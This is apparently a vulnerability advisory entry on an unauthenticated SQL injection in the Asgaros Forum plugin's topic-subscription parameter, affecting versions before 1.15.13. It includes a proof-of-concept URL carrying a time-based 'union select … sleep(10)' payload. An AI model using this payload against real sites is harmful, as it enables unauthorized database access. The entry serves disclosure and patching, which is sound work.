The plugin does not validate and escape user input when subscribing to a topic before using it in a SQL statement, leading to an unauthenticated SQL injection issue
https://example.com/forum/?subscribe_topic=1 union select 1 and sleep(10)
CPE | Name | Operator | Version |
---|---|---|---|
asgaros-forum | lt | 1.15.13 |